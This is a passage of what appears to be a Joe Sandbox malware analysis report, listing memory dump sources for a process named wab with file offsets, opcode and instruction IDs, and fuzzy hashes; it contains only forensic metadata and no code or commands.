                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36afe7a0168629c0ebbd6105f157e52802566fc445eee1cc54520c4f34def9cb
                                                          • Instruction ID: 8176f902f1ae09451b5ecab33862bbc2f9b081addfdaa53c7ae76d1b09463c95
                                                          • Opcode Fuzzy Hash: 36afe7a0168629c0ebbd6105f157e52802566fc445eee1cc54520c4f34def9cb
                                                          • Instruction Fuzzy Hash: C631A530A007099BDB25DF75C48069EBBF2FF89304F148929E505FB651EBB1E946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecb3b8a3a12b8526ce097dde8f7ce85725780fdf5ef9bf6cf9fecf96f3961a57
                                                          • Instruction ID: cff5cfdef17d61de700f8753d605c6d8d2b20cf2fb9e4b26dbfef7cadba38d72
                                                          • Opcode Fuzzy Hash: ecb3b8a3a12b8526ce097dde8f7ce85725780fdf5ef9bf6cf9fecf96f3961a57
                                                          • Instruction Fuzzy Hash: 0B315D70E016059BCB15CFB5C49469EBBF2FF89310F508529E816FB351EB72A986CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd2dd96dbe57839f7267d2c4134d645bdd3e1dad8d5fbcc7f7caff8bd088888e
                                                          • Instruction ID: ec0595d09bd676e4b3b3fc46f5f0302071d79a31dcb0aed0cb26f6630475f52b
                                                          • Opcode Fuzzy Hash: cd2dd96dbe57839f7267d2c4134d645bdd3e1dad8d5fbcc7f7caff8bd088888e
                                                          • Instruction Fuzzy Hash: 4331A130E40209DBDB65CFA9C85079EB7B2FF89308F10D529E901FB240E7B19941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ea073289d4660828ade99f2e9763bc58ec3bde7f9712bb61445e3278f9ac01a
                                                          • Instruction ID: 1efda94133163107c21f083b55597a506eff156a49fa0143cf8fe74ffb385843
                                                          • Opcode Fuzzy Hash: 0ea073289d4660828ade99f2e9763bc58ec3bde7f9712bb61445e3278f9ac01a
                                                          • Instruction Fuzzy Hash: 6931A831A012058FDB20AFA9C8C075FFBB1FB59310F31887AE519D7252DA36D942CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72b66f6b2b228d14bae05aac2a4aa592ec93eeccee2c266db6b04a97cd493f0f
                                                          • Instruction ID: 2b0a6cccefa4ff378d3d19003eba7e0d20ed042ae25242e36eae964e8b9651b1
                                                          • Opcode Fuzzy Hash: 72b66f6b2b228d14bae05aac2a4aa592ec93eeccee2c266db6b04a97cd493f0f
                                                          • Instruction Fuzzy Hash: 0F313E70E006059BCB15CFB9C49469EB7F2BF89300F508529E816FB351DB76AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59fe87c0f9b55623808f8fd519d6db996171580534f7e868adc2143d4024f045
                                                          • Instruction ID: 262ec28a4ebf2c7bf0e6471a75c6c91fe2e5dc133b8739f65c66b15ca95dc135
                                                          • Opcode Fuzzy Hash: 59fe87c0f9b55623808f8fd519d6db996171580534f7e868adc2143d4024f045
                                                          • Instruction Fuzzy Hash: 2241E1B1D00349DFEB10CFA9C584ADEBBB5FF48314F548029E909AB254DB759949CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a7ed5de18aaf09afa0b4f358173cc6762353007e9012b1b851c339c6c66c19f
                                                          • Instruction ID: 899d12b2ca1700b282a7ba58999ad8ff2f28006ad108ed8f3d3e57bc7b3f47fb
                                                          • Opcode Fuzzy Hash: 5a7ed5de18aaf09afa0b4f358173cc6762353007e9012b1b851c339c6c66c19f
                                                          • Instruction Fuzzy Hash: 5A41FEB1D0034DDFEB10CFA9C884ADEBBF5EF48314F14802AE909AB254DB75A945CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ac71470b63fc29e0bda4d1ac3eb51a63396fed5b411518e235aa360a6fa3548
                                                          • Instruction ID: c5ea96f8a3a77bb1cfdfd6e1e5ba021b5d5d39a7aab7434f0777fc31e0d39a46
                                                          • Opcode Fuzzy Hash: 6ac71470b63fc29e0bda4d1ac3eb51a63396fed5b411518e235aa360a6fa3548
                                                          • Instruction Fuzzy Hash: 28316D30E512099BDB65CF65C55479EBBB2EF99308F20942EE901FB250E7B19941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6fc31a6f06bba266f5c491b63c9bbb97cbe51ef25ef4ca0b6ec8363f52e847e
                                                          • Instruction ID: b3b74eefb7990f28ef0b78ff41cf6d80092088db03e8034d4914feea28d82343
                                                          • Opcode Fuzzy Hash: e6fc31a6f06bba266f5c491b63c9bbb97cbe51ef25ef4ca0b6ec8363f52e847e
                                                          • Instruction Fuzzy Hash: D9316C34A40214CFDB68EB74C5906AE77F2AF99308F905568DA05EB390DB7ADC01CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be49e75f87948c6d15610ce8bfa4f71258596065f5b7e0de8a7bb70211e51ea4
                                                          • Instruction ID: ef28372bb9a4f2d3c977121723a8c1c96e439a29d900e54f9b4b23b354f6c8ae
                                                          • Opcode Fuzzy Hash: be49e75f87948c6d15610ce8bfa4f71258596065f5b7e0de8a7bb70211e51ea4
                                                          • Instruction Fuzzy Hash: 0F21B070A412158FDFB45A34C49477C3BA5EB8A32AF51586AE60ECB780DB2DCC818706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd157bd3da0d00f24949a23f028d20596d3e1231430b92c430aa752169ffb190
                                                          • Instruction ID: bf92686ed57ae5fd2e29811dbd9ead1e648cf87c4ae8a79644913f7d3d38c36d
                                                          • Opcode Fuzzy Hash: bd157bd3da0d00f24949a23f028d20596d3e1231430b92c430aa752169ffb190
                                                          • Instruction Fuzzy Hash: 27219271A40215CFCFA0DB78C4503AD37F6EB88219F519479EA0ADF301EB35C9418B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5d12ae5c9a1623d63263b48a4f5284bef6db4dc38b033c1c5631c0e715064ae
                                                          • Instruction ID: 35ea4f5870b1f31f1f3f575b19c3c787251a16f96e9b35447452386a21c7eab0
                                                          • Opcode Fuzzy Hash: d5d12ae5c9a1623d63263b48a4f5284bef6db4dc38b033c1c5631c0e715064ae
                                                          • Instruction Fuzzy Hash: EB213E34B40214CFDB68EB34C5506AE77F3AF99348B908468DA05EB390DB7ADC01CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6840ecc95662b5cd8c2ceb7a9d3d2b10d192b25147438a616f165e8c84ba494
                                                          • Instruction ID: 8da015e518306a3e4c8b7e709a011ccaa925ec326fc514b26c41499db40409fc
                                                          • Opcode Fuzzy Hash: e6840ecc95662b5cd8c2ceb7a9d3d2b10d192b25147438a616f165e8c84ba494
                                                          • Instruction Fuzzy Hash: F9216D75F012249FDB00DF69D981B9EBBF2FB48710F10816AEA04E7390EB75D9408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e273d722813519656f0abcff1364adeccff2c81f5e379544f63e105ac62532e3
                                                          • Instruction ID: f29f45ca5740abf109dff5242b901457fb3168107b56d7e403c2e28343187e62
                                                          • Opcode Fuzzy Hash: e273d722813519656f0abcff1364adeccff2c81f5e379544f63e105ac62532e3
                                                          • Instruction Fuzzy Hash: D6213B75E012249FDB00DF69D980B9EBBF6FB88710F108139EA04E7380EB35D9408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa82177ac724ab3158dadb79c91037eaf2c51cfd29f1cf65acbe6b6a784fed61
                                                          • Instruction ID: 3f6a600259b3fdff4a412ee47ff43e774e17f28c0cbe0a65854f678dccc93a32
                                                          • Opcode Fuzzy Hash: fa82177ac724ab3158dadb79c91037eaf2c51cfd29f1cf65acbe6b6a784fed61
                                                          • Instruction Fuzzy Hash: 3F2124317043148FCB02A7B8D4116EE3BF2EF8A311B5480EBD655DB797EA758C4987A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2002dccff144e83dfe69f10617635c8a77ea28f2ee37b7e34a977063e877a53
                                                          • Instruction ID: f77f8ad86838e1b09f7099c9c26cc6a7b7d87e5c2e69982eccdab8bc5608b2b6
                                                          • Opcode Fuzzy Hash: c2002dccff144e83dfe69f10617635c8a77ea28f2ee37b7e34a977063e877a53
                                                          • Instruction Fuzzy Hash: 47215C70E002099BDB15CFA9D89479EFBB2FF89304F50D619E905FB241EB71A885CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03e392f8ef5b06ed9b4c9f705a2cc3904429f29687a3c3d80e0f38532d29f06f
                                                          • Instruction ID: df5fa9769042cf2598b82e44b93d4f5f12babadd8bc4d3b5f2604c5de28fffd4
                                                          • Opcode Fuzzy Hash: 03e392f8ef5b06ed9b4c9f705a2cc3904429f29687a3c3d80e0f38532d29f06f
                                                          • Instruction Fuzzy Hash: 0F21A131B021089BDF04CA69E9907CEBBB7FF98314F548435E506EB351DA72ED528B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 442a4c41b9d0008e0f88ab31150cbde78ddb3daa18d9b11cbb66fc1b994de597
                                                          • Instruction ID: 460b293e4292cfa6175ed6ceb23911fcde4bdc4865aea943dd10e475a55fdd8b
                                                          • Opcode Fuzzy Hash: 442a4c41b9d0008e0f88ab31150cbde78ddb3daa18d9b11cbb66fc1b994de597
                                                          • Instruction Fuzzy Hash: 6921A130E407099BDB15CFA5D8946DEBBB2EF89304F10C61AE915F7250EB71A945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b840f8ba2d0a9955ac6dac051378f70ffc71542bef7444a7aa22e1dd4f520ec6
                                                          • Instruction ID: 48320d29981a1cde0de615bd812231f298ee544c6fa0d71a2b63ab60ef9c2a69
                                                          • Opcode Fuzzy Hash: b840f8ba2d0a9955ac6dac051378f70ffc71542bef7444a7aa22e1dd4f520ec6
                                                          • Instruction Fuzzy Hash: 6C2171306042448FEF61D734C894B6937A6EF4A315F50996AE30ECF791DBB8DC458B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed80684965a8d53f49f1cebaad6151fb329862a64d99a4d4d974903c039d0e3a
                                                          • Instruction ID: f61d76d24bfdfa0fa7ba8bdaecefdff36fdad625149ca86a8204d907aeda6f63
                                                          • Opcode Fuzzy Hash: ed80684965a8d53f49f1cebaad6151fb329862a64d99a4d4d974903c039d0e3a
                                                          • Instruction Fuzzy Hash: D8211734A80104CFDB54DB75D558AAE77F2AF89304BA048A8E606EB3A0DB769D41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca78d32db0961a25309998619bad0a745df3b0f1c2c72f0d4d84500def1b544f
                                                          • Instruction ID: 85510a7e2949b0054367be4cb40bbc83881177da8303f1026295658f9bc0ac99
                                                          • Opcode Fuzzy Hash: ca78d32db0961a25309998619bad0a745df3b0f1c2c72f0d4d84500def1b544f
                                                          • Instruction Fuzzy Hash: 4F213676F002558FDF209B78C84479E7BE6AF88255F50483AEA0EDB340EB78CC018B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2626825826.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ecd000_wab.jbxd
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 264214125cb7a98e8242b5b646624d458c469729690d0437f170e23b356ab4cb
                                                          • Instruction ID: 5cbd0307cda6a2957b32f7659b6f2c836200f0596cd5fb066cfcedf321f3eb15
                                                          • Opcode Fuzzy Hash: 264214125cb7a98e8242b5b646624d458c469729690d0437f170e23b356ab4cb
                                                          • Instruction Fuzzy Hash: F11192B17052804FDB468A7C989474A7BD6DBEE311F14447EF00ADB393DE26DD428791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccf4e457ac1c0332379b9e698ae9b39d2661ae17e6f4c8dc5536654f8206ab11
                                                          • Instruction ID: 74aeb9d6d3ec3efb65449ac46983b97c71736463fd7ca2e438fd458802b9537f
                                                          • Opcode Fuzzy Hash: ccf4e457ac1c0332379b9e698ae9b39d2661ae17e6f4c8dc5536654f8206ab11
                                                          • Instruction Fuzzy Hash: D4115E36B001258BCB159AB9DC14AAE77EAEBC8712F14453AD909E7344DF3A9D018BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e645fcb418b772edaedc85e68aa24d555046af66164f0737d9e3ba7c24d10bd5
                                                          • Instruction ID: 7d5cf4a108dca548ff4acfa76047d5fa3c4d47f0234ed29b5a608ef54de63dc3
                                                          • Opcode Fuzzy Hash: e645fcb418b772edaedc85e68aa24d555046af66164f0737d9e3ba7c24d10bd5
                                                          • Instruction Fuzzy Hash: A901D4707011145FC702EE3CD89471A7BD6EB8D710F508539E10ADB392DE2AED428790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89a9ed0f7c3fe0a7ac5297dc461587073f45cc4e709bac4182bd5432cf9f29d7
                                                          • Instruction ID: 2d35ee832d5d6a9a4d9f896ed0efe2df4f6fecc6063ab7f4f1278698fb666af1
                                                          • Opcode Fuzzy Hash: 89a9ed0f7c3fe0a7ac5297dc461587073f45cc4e709bac4182bd5432cf9f29d7
                                                          • Instruction Fuzzy Hash: AB21E3B5D016599FDB00CF9AD880BCEFBB4FB49210F10822AE918A7340C3746554CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a994c1ed59ebd64cbce7d26be4df7b5d4a30da9f174540b0859beb814bcfaf5
                                                          • Instruction ID: 5bcabf767660f3dfb2a393c1aa6e9400e25749906aaa0852cc8379c978b4c00d
                                                          • Opcode Fuzzy Hash: 4a994c1ed59ebd64cbce7d26be4df7b5d4a30da9f174540b0859beb814bcfaf5
                                                          • Instruction Fuzzy Hash: 3101B136B000699BDB15A6BDDC647EE77EBEBC8711F44013AD945E3244DE298C1287E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2626825826.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ecd000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                          • Instruction ID: 22760a0d2a9a90da673acc9e06157ca6e690e6e5f362e223e6cba859c808e03b
                                                          • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                          • Instruction Fuzzy Hash: 8C118E75544244DFCB15CF50DAC4B15BB61FB88318F24C6AED8494B756C33AD44ACB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8eff2b7a347ce611e8d29dc6fff21f07e0ff602633724ff173c45ecaa35cf5c
                                                          • Instruction ID: cef42461536673ba3148fdc4b82d39fd8944c8407a066c969b1880e7a0703a82
                                                          • Opcode Fuzzy Hash: d8eff2b7a347ce611e8d29dc6fff21f07e0ff602633724ff173c45ecaa35cf5c
                                                          • Instruction Fuzzy Hash: 8F018472A40219CFCFA1EFB9845029D77F6EB48254B11907AD509EB201E731C9418FD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6da9bc427779dcfc4c047ef6bc6ef205d359dcc1516d72f0c3fc88373865ce3
                                                          • Instruction ID: 636c896ee85f6ab66017fc25f74da7e75eac2899d2447337d2f7175f25dc535a
                                                          • Opcode Fuzzy Hash: d6da9bc427779dcfc4c047ef6bc6ef205d359dcc1516d72f0c3fc88373865ce3
                                                          • Instruction Fuzzy Hash: 0911D0B5D01259AFDB00CF9AD884BCEFBB4FF49310F10812AE918A7340C374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37b5cbf48df7c62b08cbb72fab8c2e7967c7e194bd3a755379a1b0a81b76eec4
                                                          • Instruction ID: e37eca96bb68fb61bf26ab1b5399d51933b71ad5ad11592016d03fb4dd39a26c
                                                          • Opcode Fuzzy Hash: 37b5cbf48df7c62b08cbb72fab8c2e7967c7e194bd3a755379a1b0a81b76eec4
                                                          • Instruction Fuzzy Hash: 2E01A9B17000104BD7449A7D8454B0BB7CAEBDC720F20883DF00EDB742DE6ADD0243A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a73abf3086760303703ab3bbb003215fdc3e2467960ce1ea5589fe3d6905059b
                                                          • Instruction ID: 0f794d93bdaaba4c9880b8098b453480e202194eede589cdb06fba44b12c89c6
                                                          • Opcode Fuzzy Hash: a73abf3086760303703ab3bbb003215fdc3e2467960ce1ea5589fe3d6905059b
                                                          • Instruction Fuzzy Hash: 9F0162327003154FDB149A798868A2F7BEBAFC8B653518539DA05C7751FF31DC018665
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e82e0b71f1c8beb4c967a44a484a677eff7dfbac60ce2d87dfecd5963388f324
                                                          • Instruction ID: 1bfd78d478240180973b4505b272a430d350c0ab4ebc7f839ef1753038ec2d44
                                                          • Opcode Fuzzy Hash: e82e0b71f1c8beb4c967a44a484a677eff7dfbac60ce2d87dfecd5963388f324
                                                          • Instruction Fuzzy Hash: 43018436B003114FD7149F7985A8A3E6BEBAF847553558539D905C7611FF31C8018254
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33afb4b05e72fd754f0c8a10c765c7824c24fbeb31a1ce9be8b4832b86eb65b9
